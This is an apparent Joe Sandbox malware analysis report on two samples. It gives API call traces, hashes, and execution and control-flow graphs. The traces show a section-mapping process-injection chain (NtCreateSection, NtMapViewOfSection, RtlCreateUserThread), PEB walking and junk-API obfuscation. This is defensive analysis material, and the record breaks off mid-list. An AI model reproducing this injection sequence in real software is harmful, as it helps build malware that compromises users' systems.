                                                              APIs
                                                              • LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
                                                              • Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14
                                                              APIs
                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 0041599D
                                                              • WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 004159C1
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004159C9
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
                                                              • String ID: -
                                                              • API String ID: 1791614364-2547889144
                                                              • Opcode ID: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
                                                              • Instruction ID: 5368a2a332436176f0270f6e324495ff1ab7250c8f8a8be8252ed3b816e40977
                                                              • Opcode Fuzzy Hash: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
                                                              • Instruction Fuzzy Hash: ED215B70A84308EBD750CF54DC86FD97BB4EB48761F1180A5FA49AA1C0CE7849C49B9A
                                                              APIs
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: CalendarInfoNameObjectOpenPathShort
                                                              • String ID: -
                                                              • API String ID: 2381848886-2547889144
                                                              • Opcode ID: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
                                                              • Instruction ID: 0db35e2b396c7aacfab1ac635380de6c7ec9f3e99e7bba80867eae6dc532c324
                                                              • Opcode Fuzzy Hash: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
                                                              • Instruction Fuzzy Hash: 3701F931A84204DADB708F50DC82BD97BB4FB44765F124195F6887F1C0CE7419C4DB89
                                                              APIs
                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415AA4
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ABF
                                                              • HeapDestroy.KERNEL32(00000000), ref: 00415ADE
                                                              • GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415AE8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                              • String ID:
                                                              • API String ID: 4159173863-0
                                                              • Opcode ID: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
                                                              • Instruction ID: 9b8f197d1e03404965dc2a48b96bd0ad9da3adac25fcf19301518012742e0a15
                                                              • Opcode Fuzzy Hash: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
                                                              • Instruction Fuzzy Hash: 5B01A270A80608EFE750EBA4EC85BDA77B8EB0C356F41403AF605D7280DE7459448F9A

                                                              Execution Graph

                                                              Execution Coverage:12%
                                                              Dynamic/Decrypted Code Coverage:15.7%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:178
                                                              Total number of Limit Nodes:7
                                                              execution_graph 3142 4019c0 3143 4019c8 3142->3143 3144 4019e7 3142->3144 3145 401a29 Sleep 3144->3145 3146 4014fb HeapCreate 3145->3146 3147 401a44 3146->3147 3148 4015fb 7 API calls 3147->3148 3149 401a55 3147->3149 3148->3149 3109 402f42 3111 402f18 3109->3111 3110 4019e0 9 API calls 3112 40304f 3110->3112 3111->3110 3111->3112 3129 403103 3130 403246 3129->3130 3131 40312d 3129->3131 3131->3130 3132 4031f0 RtlCreateUserThread NtTerminateProcess 3131->3132 3132->3130 3033 401a04 3034 401a13 3033->3034 3035 401a29 Sleep 3034->3035 3036 4014fb HeapCreate 3035->3036 3037 401a44 3036->3037 3039 401a55 3037->3039 3040 4015fb 3037->3040 3041 40160b 3040->3041 3042 4016af NtDuplicateObject 3041->3042 3051 4017cb 3041->3051 3043 4016cc NtCreateSection 3042->3043 3042->3051 3044 4016f2 NtMapViewOfSection 3043->3044 3045 40174c NtCreateSection 3043->3045 3044->3045 3046 401715 NtMapViewOfSection 3044->3046 3047 401778 3045->3047 3045->3051 3046->3045 3048 401733 3046->3048 3049 401782 NtMapViewOfSection 3047->3049 3047->3051 3048->3045 3050 4017a9 NtMapViewOfSection 3049->3050 3049->3051 3050->3051 3051->3039 3113 401544 3114 401545 3113->3114 3115 40152f HeapCreate 3114->3115 3118 4015ea 3114->3118 3124 40161c 3114->3124 3116 4016af NtDuplicateObject 3117 4016cc NtCreateSection 3116->3117 3128 4017cb 3116->3128 3120 4016f2 NtMapViewOfSection 3117->3120 3121 40174c NtCreateSection 3117->3121 3120->3121 3122 401715 NtMapViewOfSection 3120->3122 3123 401778 3121->3123 3121->3128 3122->3121 3125 401733 3122->3125 3126 401782 NtMapViewOfSection 3123->3126 3123->3128 3124->3116 3124->3128 3125->3121 3127 4017a9 NtMapViewOfSection 3126->3127 3126->3128 3127->3128 3052 401606 3052->3052 3053 401609 3052->3053 3054 4016af NtDuplicateObject 3053->3054 3056 4017cb 3053->3056 3055 4016cc NtCreateSection 3054->3055 3054->3056 3057 4016f2 NtMapViewOfSection 3055->3057 3058 40174c NtCreateSection 3055->3058 3057->3058 3059 401715 NtMapViewOfSection 3057->3059 3058->3056 3060 401778 3058->3060 3059->3058 3063 401733 3059->3063 3060->3056 3061 401782 NtMapViewOfSection 3060->3061 3061->3056 3062 4017a9 NtMapViewOfSection 3061->3062 3062->3056 3063->3058 3064 401613 3065 40161c 3064->3065 3066 4016af NtDuplicateObject 3065->3066 3075 4017cb 3065->3075 3067 4016cc NtCreateSection 3066->3067 3066->3075 3068 4016f2 NtMapViewOfSection 3067->3068 3069 40174c NtCreateSection 3067->3069 3068->3069 3070 401715 NtMapViewOfSection 3068->3070 3071 401778 3069->3071 3069->3075 3070->3069 3072 401733 3070->3072 3073 401782 NtMapViewOfSection 3071->3073 3071->3075 3072->3069 3074 4017a9 NtMapViewOfSection 3073->3074 3073->3075 3074->3075 2964 403257 2965 4031f0 RtlCreateUserThread NtTerminateProcess 2964->2965 2967 403261 2964->2967 2966 403246 2965->2966 2967->2967 3102 402ed9 3104 402e8d 3102->3104 3103 40304f 3104->3102 3104->3103 3105 4019e0 9 API calls 3104->3105 3105->3103 3176 2cb092b GetPEB 3177 2cb0972 3176->3177 2908 415ba0 2911 4157a0 2908->2911 2910 415ba5 2912 4157ad 2911->2912 2913 415997 2912->2913 2914 415887 InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA 2912->2914 2915 4159a5 SetCommState 2913->2915 2919 4159be 2913->2919 2916 4158e1 7 API calls 2914->2916 2915->2913 2917 415981 PulseEvent 2916->2917 2918 415988 2916->2918 2917->2918 2918->2913 2920 415a88 2919->2920 2921 4159cb 7 API calls 2919->2921 2934 415410 LocalAlloc 2920->2934 2928 415a6b 2921->2928 2925 415a8d LoadLibraryA 2935 415440 GetModuleHandleW GetProcAddress VirtualProtect 2925->2935 2926 415add 2936 415710 2926->2936 2928->2920 2929 415ae2 2930 415b1d InterlockedDecrement 2929->2930 2931 415b33 2929->2931 2930->2929 2932 415b52 GetFileAttributesA 2931->2932 2933 415b62 2931->2933 2932->2931 2933->2910 2934->2925 2935->2926 2937 415739 QueryDosDeviceW 2936->2937 2938 41574a 2936->2938 2937->2938 2947 4155d0 2938->2947 2941 415765 2950 415610 2941->2950 2942 41575d FreeEnvironmentStringsA 2942->2941 2945 41577c HeapDestroy GetNumaProcessorNode 2946 41578e 2945->2946 2946->2929 2948 4155e1 FatalAppExitA GetModuleHandleA 2947->2948 2949 4155f3 2947->2949 2948->2949 2949->2941 2949->2942 2951 415645 2950->2951 2952 415634 BuildCommDCBA 2950->2952 2953 41566f 2951->2953 2954 41564d WritePrivateProfileStringA FreeEnvironmentStringsA 2951->2954 2952->2953 2955 4156dc 2953->2955 2957 4156a9 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 2953->2957 2958 415600 2953->2958 2954->2953 2955->2945 2955->2946 2957->2953 2961 415590 2958->2961 2962 4155b9 2961->2962 2963 4155ac SetEvent 2961->2963 2962->2953 2963->2962 2987 2da9ff3 2988 2daa002 2987->2988 2991 2daa793 2988->2991 2992 2daa7ae 2991->2992 2993 2daa7b7 CreateToolhelp32Snapshot 2992->2993 2994 2daa7d3 Module32First 2992->2994 2993->2992 2993->2994 2995 2daa7e2 2994->2995 2997 2daa00b 2994->2997 2998 2daa452 2995->2998 2999 2daa47d 2998->2999 3000 2daa4c6 2999->3000 3001 2daa48e VirtualAlloc 2999->3001 3000->3000 3001->3000 3150 4019eb 3151 4019f0 3150->3151 3152 401a29 Sleep 3151->3152 3153 4014fb HeapCreate 3152->3153 3154 401a44 3153->3154 3155 4015fb 7 API calls 3154->3155 3156 401a55 3154->3156 3155->3156 2968 2cb003c 2969 2cb0049 2968->2969 2981 2cb0e0f SetErrorMode SetErrorMode 2969->2981 2974 2cb0265 2975 2cb02ce VirtualProtect 2974->2975 2977 2cb030b 2975->2977 2976 2cb0439 VirtualFree 2980 2cb04be LoadLibraryA 2976->2980 2977->2976 2979 2cb08c7 2980->2979 2982 2cb0223 2981->2982 2983 2cb0d90 2982->2983 2984 2cb0dad 2983->2984 2985 2cb0dbb GetPEB 2984->2985 2986 2cb0238 VirtualAlloc 2984->2986 2985->2986 2986->2974 3028 415679 3030 415680 3028->3030 3029 415600 SetEvent 3029->3030 3030->3029 3031 4156a9 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 3030->3031 3032 4156dc 3030->3032 3031->3030 3106 4014fa 3107 40150c HeapCreate 3106->3107 3002 402fbe 3003 402fc3 3002->3003 3004 40304f 3003->3004 3006 4019e0 3003->3006 3007 4019e7 3006->3007 3008 401a29 Sleep 3007->3008 3013 4014fb 3008->3013 3010 401a44 3011 4015fb 7 API calls 3010->3011 3012 401a55 3010->3012 3011->3012 3012->3004 3014 40150c HeapCreate 3013->3014

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4157a0-4157c8 2 4157d0-4157d7 0->2 3 4157d9-4157db 2->3 4 4157df-4157e5 2->4 3->4 5 4157e7-4157f1 4->5 6 4157f6-415800 4->6 5->6 7 415802-415831 6->7 8 41583b-415842 6->8 7->8 8->2 9 415844-41584c 8->9 11 415850-415856 9->11 12 415864-41586b 11->12 13 415858-41585e 11->13 14 415871-415878 12->14 15 41586d 12->15 13->12 14->11 16 41587a-415881 14->16 15->14 17 415997-4159a3 16->17 18 415887-41597f InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA GetDefaultCommConfigA MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 4159a5-4159b3 SetCommState 17->19 22 415981-415982 PulseEvent 18->22 23 415988-415994 18->23 24 4159b5-4159bc 19->24 25 4159be-4159c5 19->25 22->23 23->17 24->19 24->25 27 415a88-415a97 call 415410 25->27 28 4159cb-415a85 GetConsoleAliasesLengthW GetStringTypeExW GetComputerNameW GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->28 33 415a99-415aaa 27->33 34 415acd-415ad8 LoadLibraryA call 415440 27->34 28->27 35 415ab0-415ac0 33->35 40 415add-415aee call 415710 34->40 38 415ac2 35->38 39 415ac8-415acb 35->39 38->39 39->34 39->35 44 415af0-415af7 40->44 46 415b07-415b0d 44->46 47 415af9-415b03 44->47 49 415b14-415b1b 46->49 50 415b0f call 415430 46->50 47->46 53 415b2a-415b31 49->53 54 415b1d-415b24 InterlockedDecrement 49->54 50->49 53->44 55 415b33-415b3d 53->55 54->53 56 415b40-415b50 55->56 57 415b52-415b57 GetFileAttributesA 56->57 58 415b5d-415b60 56->58 57->58 58->56 59 415b62-415b6d 58->59 60 415b70-415b75 59->60 61 415b77-415b7d 60->61 62 415b7f-415b85 60->62 61->62 63 415b87-415b94 61->63 62->60 62->63
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415892
                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041589F
                                                              • FindAtomW.KERNEL32(00000000), ref: 004158A6
                                                              • GetConsoleMode.KERNEL32(00000000,00000000), ref: 004158AE
                                                              • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004158C6
                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004158ED
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 004158F5
                                                              • GetVersionExW.KERNEL32(?), ref: 00415902
                                                              • DisconnectNamedPipe.KERNEL32(?), ref: 00415915
                                                              • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041595A
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415969
                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415972
                                                              • PulseEvent.KERNEL32(00000000), ref: 00415982
                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 004159A9
                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004159DA
                                                              • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004159EB
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 004159FF
                                                              • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415A3F
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00415A46
                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415A4C
                                                              • GetBinaryType.KERNEL32(004173D8,?), ref: 00415A5E
                                                              • LoadLibraryA.KERNELBASE(004173E8), ref: 00415AD2
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00415B24
                                                              • GetFileAttributesA.KERNEL32(004173F4), ref: 00415B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_F421.jbxd
                                                              Similarity
                                                              • API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
                                                              • String ID: k`$}$
                                                              • API String ID: 723190256-956986773
                                                              • Opcode ID: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
                                                              • Instruction ID: 3bf9ffe576a9fbcecb19cba34f73af1320b210f32c47b7a0ffd63e7749ed94fc
                                                              • Opcode Fuzzy Hash: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
                                                              • Instruction Fuzzy Hash: 17A1D071941624DFC724DB61DC48EDB7B79EF8D350F0180AAF609A7250DB385A81CFA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 150 4014fb-401504 151 40151b 150->151 152 40150c-401531 150->152 151->152 158 401542 HeapCreate 152->158
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                              • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                              • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                              • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 160 4015fb-401604 161 401615 160->161 162 40160b-401611 160->162 161->162 163 401618-40162c 161->163 162->163 167 401643 163->167 168 401634-401659 call 40127e 163->168 167->168 173 40165b 168->173 174 40165e-401663 168->174 173->174 176 401989-401991 174->176 177 401669-40167a 174->177 176->174 180 401996-4019dd call 40127e 176->180 181 401680-4016a9 177->181 182 401987 177->182 181->182 189 4016af-4016c6 NtDuplicateObject 181->189 182->180 189->182 191 4016cc-4016f0 NtCreateSection 189->191 193 4016f2-401713 NtMapViewOfSection 191->193 194 40174c-401772 NtCreateSection 191->194 193->194 196 401715-401731 NtMapViewOfSection 193->196 194->182 197 401778-40177c 194->197 196->194 199 401733-401749 196->199 197->182 200 401782-4017a3 NtMapViewOfSection 197->200 199->194 200->182 202 4017a9-4017c5 NtMapViewOfSection 200->202 202->182 206 4017cb call 4017d0 202->206
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                              • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                              • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                              • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 208 401613-40162c 212 401643 208->212 213 401634-401659 call 40127e 208->213 212->213 218 40165b 213->218 219 40165e-401663 213->219 218->219 221 401989-401991 219->221 222 401669-40167a 219->222 221->219 225 401996-4019dd call 40127e 221->225 226 401680-4016a9 222->226 227 401987 222->227 226->227 234 4016af-4016c6 NtDuplicateObject 226->234 227->225 234->227 236 4016cc-4016f0 NtCreateSection 234->236 238 4016f2-401713 NtMapViewOfSection 236->238 239 40174c-401772 NtCreateSection 236->239 238->239 241 401715-401731 NtMapViewOfSection 238->241 239->227 242 401778-40177c 239->242 241->239 244 401733-401749 241->244 242->227 245 401782-4017a3 NtMapViewOfSection 242->245 244->239 245->227 247 4017a9-4017c5 NtMapViewOfSection 245->247 247->227 251 4017cb call 4017d0 247->251
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                              • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                              • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                              • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 253 401606-401607 253->253 254 401609 253->254 255 40160b-40162c 254->255 256 40163c-401659 call 40127e 254->256 266 401643 255->266 267 401634-401639 255->267 264 40165b 256->264 265 40165e-401663 256->265 264->265 269 401989-401991 265->269 270 401669-40167a 265->270 266->267 267->256 269->265 273 401996-4019dd call 40127e 269->273 274 401680-4016a9 270->274 275 401987 270->275 274->275 282 4016af-4016c6 NtDuplicateObject 274->282 275->273 282->275 284 4016cc-4016f0 NtCreateSection 282->284 286 4016f2-401713 NtMapViewOfSection 284->286 287 40174c-401772 NtCreateSection 284->287 286->287 289 401715-401731 NtMapViewOfSection 286->289 287->275 290 401778-40177c 287->290 289->287 292 401733-401749 289->292 290->275 293 401782-4017a3 NtMapViewOfSection 290->293 292->287 293->275 295 4017a9-4017c5 NtMapViewOfSection 293->295 295->275 299 4017cb call 4017d0 295->299
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                              • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                              • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                              • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 401627-40162c 305 401643 301->305 306 401634-401659 call 40127e 301->306 305->306 311 40165b 306->311 312 40165e-401663 306->312 311->312 314 401989-401991 312->314 315 401669-40167a 312->315 314->312 318 401996-4019dd call 40127e 314->318 319 401680-4016a9 315->319 320 401987 315->320 319->320 327 4016af-4016c6 NtDuplicateObject 319->327 320->318 327->320 329 4016cc-4016f0 NtCreateSection 327->329 331 4016f2-401713 NtMapViewOfSection 329->331 332 40174c-401772 NtCreateSection 329->332 331->332 334 401715-401731 NtMapViewOfSection 331->334 332->320 335 401778-40177c 332->335 334->332 337 401733-401749 334->337 335->320 338 401782-4017a3 NtMapViewOfSection 335->338 337->332 338->320 340 4017a9-4017c5 NtMapViewOfSection 338->340 340->320 344 4017cb call 4017d0 340->344
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                              • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                              • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                              • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 346 401641-401659 call 40127e 353 40165b 346->353 354 40165e-401663 346->354 353->354 356 401989-401991 354->356 357 401669-40167a 354->357 356->354 360 401996-4019dd call 40127e 356->360 361 401680-4016a9 357->361 362 401987 357->362 361->362 369 4016af-4016c6 NtDuplicateObject 361->369 362->360 369->362 371 4016cc-4016f0 NtCreateSection 369->371 373 4016f2-401713 NtMapViewOfSection 371->373 374 40174c-401772 NtCreateSection 371->374 373->374 376 401715-401731 NtMapViewOfSection 373->376 374->362 377 401778-40177c 374->377 376->374 379 401733-401749 376->379 377->362 380 401782-4017a3 NtMapViewOfSection 377->380 379->374 380->362 382 4017a9-4017c5 NtMapViewOfSection 380->382 382->362 386 4017cb call 4017d0 382->386
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
